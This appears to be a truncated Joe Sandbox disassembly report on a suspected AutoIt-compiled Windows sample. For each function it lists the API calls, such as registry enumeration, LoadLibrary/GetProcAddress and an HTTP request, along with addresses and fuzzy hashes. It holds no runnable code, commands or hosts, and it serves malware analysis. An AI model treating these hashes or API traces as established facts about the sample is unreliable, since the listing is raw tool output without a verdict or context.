                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(014BEB9C,014BEB9C), ref: 008F7243
                                                                        • EnterCriticalSection.KERNEL32(014BEB54,?,008CD0F3), ref: 008F7254
                                                                        • TerminateThread.KERNEL32(014BEB98,000001F6,?,008CD0F3), ref: 008F7261
                                                                        • WaitForSingleObject.KERNEL32(014BEB98,000003E8,?,008CD0F3), ref: 008F726E
                                                                          • Part of subcall function 008F6C35: CloseHandle.KERNEL32(014BEB98,014BEB54,008F727B,?,008CD0F3), ref: 008F6C3F
                                                                        • InterlockedExchange.KERNEL32(014BEB9C,000001F6), ref: 008F7281
                                                                        • LeaveCriticalSection.KERNEL32(014BEB54,?,008CD0F3), ref: 008F7288
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3495660284-0
                                                                        • Opcode ID: ae2cbc6bad6001e02bcdbe529f6f86a480c01429a0fbfac876e5abb7ca9ddd97
                                                                        • Instruction ID: bc9849677f81f8a54d4ae014b0b4ac40491d7fdffc900aed57fe7f3803efe006
                                                                        • Opcode Fuzzy Hash: ae2cbc6bad6001e02bcdbe529f6f86a480c01429a0fbfac876e5abb7ca9ddd97
                                                                        • Instruction Fuzzy Hash: 8AF0E236658A0AEBE7111B34EC4C9EB373AFF04312B500A32F603D00A0CBB61800EB50
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008E899D
                                                                        • UnloadUserProfile.USERENV(?,?), ref: 008E89A9
                                                                        • CloseHandle.KERNEL32(?), ref: 008E89B2
                                                                        • CloseHandle.KERNEL32(?), ref: 008E89BA
                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 008E89C3
                                                                        • HeapFree.KERNEL32(00000000), ref: 008E89CA
                                                                        Similarity
                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                        • String ID:
                                                                        • API String ID: 146765662-0
                                                                        • Opcode ID: f85fe1abefe0c3e56f856a9b272579d7cee391cfd7da83800b68828253091a21
                                                                        • Instruction ID: d2c491b294d055126ce56a05a6eda5c2182b8843abac94426a9f1db95c7f23ed
                                                                        • Opcode Fuzzy Hash: f85fe1abefe0c3e56f856a9b272579d7cee391cfd7da83800b68828253091a21
                                                                        • Instruction Fuzzy Hash: FBE0C236218809FBDA011FE1EC1C98ABB69FB89362B508230F229810B0CB329421EB50
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 00908613
                                                                        • CharUpperBuffW.USER32(?,?), ref: 00908722
                                                                        • VariantClear.OLEAUT32(?), ref: 0090889A
                                                                          • Part of subcall function 008F7562: VariantInit.OLEAUT32(00000000), ref: 008F75A2
                                                                          • Part of subcall function 008F7562: VariantCopy.OLEAUT32(00000000,?), ref: 008F75AB
                                                                          • Part of subcall function 008F7562: VariantClear.OLEAUT32(00000000), ref: 008F75B7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                        • API String ID: 4237274167-1221869570
                                                                        • Opcode ID: 445cb5e7ace87ed098d655415cc73540dda67128ff92fc8d536c9e49b1291a56
                                                                        • Instruction ID: fb99b88e607920cf3c75bbda92e401fb62649c1aff78a3982d4e10f492b2fc48
                                                                        • Opcode Fuzzy Hash: 445cb5e7ace87ed098d655415cc73540dda67128ff92fc8d536c9e49b1291a56
                                                                        • Instruction Fuzzy Hash: 53914A716043019FCB10EF28C48595BBBE8FF89714F14892DF89A8B2A1DB31E945CB52
                                                                        APIs
                                                                          • Part of subcall function 008AFC86: _wcscpy.LIBCMT ref: 008AFCA9
                                                                        • _memset.LIBCMT ref: 008F2B87
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008F2BB6
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008F2C69
                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008F2C97
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                        • String ID: 0
                                                                        • API String ID: 4152858687-4108050209
                                                                        • Opcode ID: f6d2652e426589f88e3ad349ad69400f43e209ba2fe3c8de19bcd9313528956d
                                                                        • Instruction ID: 534013d4f86b24c6312b706463eb48f47776a7d51e366ca74a9d49e0163fc468
                                                                        • Opcode Fuzzy Hash: f6d2652e426589f88e3ad349ad69400f43e209ba2fe3c8de19bcd9313528956d
                                                                        • Instruction Fuzzy Hash: E651CC712083099AD724EF38C855A7FB7E8FF99360F040A2DFA95D6291DB70CC049B92
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 008ED5D4
                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008ED60A
                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008ED61B
                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008ED69D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                        • String ID: DllGetClassObject
                                                                        • API String ID: 753597075-1075368562
                                                                        • Opcode ID: 8832fc65473daa84b223ffaf5d6a43f978c50e0c6bcb8869c2fbe22e492ba404
                                                                        • Instruction ID: 157a35ae6be1702190cb15ef9bd32f1f36f1f84727b81d4ec220118f5411a525
                                                                        • Opcode Fuzzy Hash: 8832fc65473daa84b223ffaf5d6a43f978c50e0c6bcb8869c2fbe22e492ba404
                                                                        • Instruction Fuzzy Hash: C441ACB1600348EFDB05CF65C884A9ABBA9FF56314F1181A9AC09DF215D7B1D948CBE0
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F27C0
                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008F27DC
                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 008F2822
                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00955890,00000000), ref: 008F286B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1173514356-4108050209
                                                                        • Opcode ID: 7bf61a6efee24151b5cb236f780072b7b4637adc9a0c86daabbede23cc863c4d
                                                                        • Instruction ID: 3fe05c23f08d81b0ba45352a2cbd8821dc836c9a9bc6e1618a66c340b0edb8cf
                                                                        • Opcode Fuzzy Hash: 7bf61a6efee24151b5cb236f780072b7b4637adc9a0c86daabbede23cc863c4d
                                                                        • Instruction Fuzzy Hash: E741AE702143499FDB20DF38C845B6ABBE9FF85764F04492DFAA5D7291D730A805CB52
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0090D7C5
                                                                          • Part of subcall function 0089784B: _memmove.LIBCMT ref: 00897899
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharLower_memmove
                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                        • API String ID: 3425801089-567219261
                                                                        • Opcode ID: 9e2dc16eee78030b68930aace1cb346283daa2de85cdb6cdfb94d070cdfa0ce9
                                                                        • Instruction ID: e457a159b7fdc27d6b106f6ea5719589362504e9deefc3eeb9d53852c06c889a
                                                                        • Opcode Fuzzy Hash: 9e2dc16eee78030b68930aace1cb346283daa2de85cdb6cdfb94d070cdfa0ce9
                                                                        • Instruction Fuzzy Hash: 1D31A171904619AFCF10EF98CC519FEB7B9FF05720B108A29E826977D1DB31A905CB80
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 008EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008EAABC
                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008E8F14
                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008E8F27
                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 008E8F57
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$_memmove$ClassName
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 365058703-1403004172
                                                                        • Opcode ID: e404087956c1d128fcc4428b2cdfc7f4f68abfce0782aae5041a5dada66548d7
                                                                        • Instruction ID: 540d16a188ddb925317c8cb83b4f13c388f0f55e5f421639519e3d266b23e830
                                                                        • Opcode Fuzzy Hash: e404087956c1d128fcc4428b2cdfc7f4f68abfce0782aae5041a5dada66548d7
                                                                        • Instruction Fuzzy Hash: BA210471A04108BEDF14ABB9DC85DFFB769EF46364B084529F825E72E0DF354809D610
                                                                        APIs
                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0090184C
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00901872
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009018A2
                                                                        • InternetCloseHandle.WININET(00000000), ref: 009018E9
                                                                          • Part of subcall function 00902483: GetLastError.KERNEL32(?,?,00901817,00000000,00000000,00000001), ref: 00902498
                                                                          • Part of subcall function 00902483: SetEvent.KERNEL32(?,?,00901817,00000000,00000000,00000001), ref: 009024AD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                        • String ID:
                                                                        • API String ID: 3113390036-3916222277
                                                                        • Opcode ID: 7d9afb1e0728b6b69ae10d4df236d1327bfef8a8410cacfbf23473ebe91a6b25
                                                                        • Instruction ID: 36bf033744ee1bfe3634a0368fa435fafd3fd2fa82f1122eaecd7c2f967340a0
                                                                        • Opcode Fuzzy Hash: 7d9afb1e0728b6b69ae10d4df236d1327bfef8a8410cacfbf23473ebe91a6b25
                                                                        • Instruction Fuzzy Hash: CB2192B1604308BFEB119F64DC85EBF77EDEB88754F10812AF90596280DB349E05A7A1
                                                                        APIs
                                                                          • Part of subcall function 00891D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00891D73
                                                                          • Part of subcall function 00891D35: GetStockObject.GDI32(00000011), ref: 00891D87
                                                                          • Part of subcall function 00891D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00891D91
                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00916461
                                                                        • LoadLibraryW.KERNEL32(?,?,?,?,?,008CCB2A,?,?,?,?,?,?,?,?,?), ref: 00916468
                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0091647D
                                                                        • DestroyWindow.USER32(?,?,?,?,?,008CCB2A,?,?,?,?,?,?,?,?,?), ref: 00916485
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                        • String ID: SysAnimate32
                                                                        • API String ID: 4146253029-1011021900
                                                                        • Opcode ID: 0830a2ef0b39307c07899a9accdb919b3c77d46f5df45397cb6e1d3577a3bb45
                                                                        • Instruction ID: e81ccab770fe7552ee1597fa8a40d75087194d577e7daae5a0e7f4cbee7bd76a
                                                                        • Opcode Fuzzy Hash: 0830a2ef0b39307c07899a9accdb919b3c77d46f5df45397cb6e1d3577a3bb45
                                                                        • Instruction Fuzzy Hash: A6218E71B1020DABEF108FA4DC94EFB37ADEB59368F108629FA50920E0D7319C81A760
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 008F6DBC
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008F6DEF
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 008F6E01
                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008F6E3B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        • Opcode ID: 32c4a7351095f5920dee2d1aa206a0747662d0f1492c798e2eec82ddc4190847
                                                                        • Instruction ID: 50ed612e4adc16443ae0874c179db8c77f147a867ae5bf7b6a388f5bc3a450da
                                                                        • Opcode Fuzzy Hash: 32c4a7351095f5920dee2d1aa206a0747662d0f1492c798e2eec82ddc4190847
                                                                        • Instruction Fuzzy Hash: 7521817560020DABDB20AF39DC05AAA77B4FF54760F204B19FEA0D72D0E7719960DB50
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 008F6E89
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008F6EBB
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 008F6ECC
                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008F6F06
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        • Opcode ID: dad4aa27e6238d24e3228dcc17b8c9396c56090c417c3c16400ba9553e61212c
                                                                        • Instruction ID: 50d767f9f71ead9237488f23a206dc87f649e68b6f615e3c5ed8a58c9d9c4b4c
                                                                        • Opcode Fuzzy Hash: dad4aa27e6238d24e3228dcc17b8c9396c56090c417c3c16400ba9553e61212c
                                                                        • Instruction Fuzzy Hash: 93217F7A60020D9BDB209F79D804AAA77A8FF55724F304B19FAA0D72D0E7709860CB61
APIs
• CharUpperBuffW.USER32(?,?), ref: 008F1B19
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 3964851224-769500911
• Opcode ID: dc6cfc6aafb61fee14eed65f3b2005728a634b87ce5f422cb8a21a811e8c563b
• Instruction ID: 0c01ac63354ed1fb496ead16b024de1da9f48557da595d75bf02dd79f5cf1b6c
• Opcode Fuzzy Hash: dc6cfc6aafb61fee14eed65f3b2005728a634b87ce5f422cb8a21a811e8c563b
• Instruction Fuzzy Hash: 29113C30910219CBCF10EF68D8659FFB7B4FF25704B1484A5E825A7692EB325906CF51
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0090EC07
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0090EC37
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0090ED6A
• CloseHandle.KERNEL32(?), ref: 0090EDEB
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: be28208c33464ee37914a9fb133542387899d6c186e6f91bf4f4bb65ab9ec1e5
• Instruction ID: 92b0acbe81b63c8feb4d6beb7bcc343a4dfe61ded65244d1ed59912e2d0cbc9a
• Opcode Fuzzy Hash: be28208c33464ee37914a9fb133542387899d6c186e6f91bf4f4bb65ab9ec1e5
• Instruction Fuzzy Hash: 57814C716047019FDB60EF29C886B2AB7E5EF55710F04882DF999DB2D2D670AC40CB92
APIs
  • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
  • Part of subcall function 00910E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090FDAD,?,?), ref: 00910E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009100FD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0091013C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00910183
• RegCloseKey.ADVAPI32(?,?), ref: 009101AF
• RegCloseKey.ADVAPI32(00000000), ref: 009101BC
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
• Opcode ID: 8683e5562fd9d8e2c5a22bce6a67c6b2ee2c56164ddd0744fe62db46c6c69693
• Instruction ID: e21528e8c7a6105b29b8cf60ce6c0aade197c130d52033aa257086839a8d33da
• Opcode Fuzzy Hash: 8683e5562fd9d8e2c5a22bce6a67c6b2ee2c56164ddd0744fe62db46c6c69693
• Instruction Fuzzy Hash: 33515F71218208AFDB04EF68C881FAAB7E9FF84314F44491DF59687291DB75E984CB52
APIs
  • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0090D927
• GetProcAddress.KERNEL32(00000000,?), ref: 0090D9AA
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0090D9C6
• GetProcAddress.KERNEL32(00000000,?), ref: 0090DA07
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0090DA21
  • Part of subcall function 00895A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008F7896,?,?,00000000), ref: 00895A2C
  • Part of subcall function 00895A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008F7896,?,?,00000000,?,?), ref: 00895A50
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow
• String ID:
• API String ID: 3910169830-0
• Opcode ID: 132ae123a80992e04a741fad7b4549b8374f167f389f8c6822eb46fe4abb48d2
• Instruction ID: 8a87e131877c1626fb857c0bb9c2d2ca2b565a4742210f77d288dfac316d5ace
• Opcode Fuzzy Hash: 132ae123a80992e04a741fad7b4549b8374f167f389f8c6822eb46fe4abb48d2
• Instruction Fuzzy Hash: F5511635A05209DFCB00EFA8C4959ADB7F9FF09320B188069E85AAB352D735AD45CF91
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008FE61F
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008FE648
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008FE687
  • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008FE6AC
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008FE6B4
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
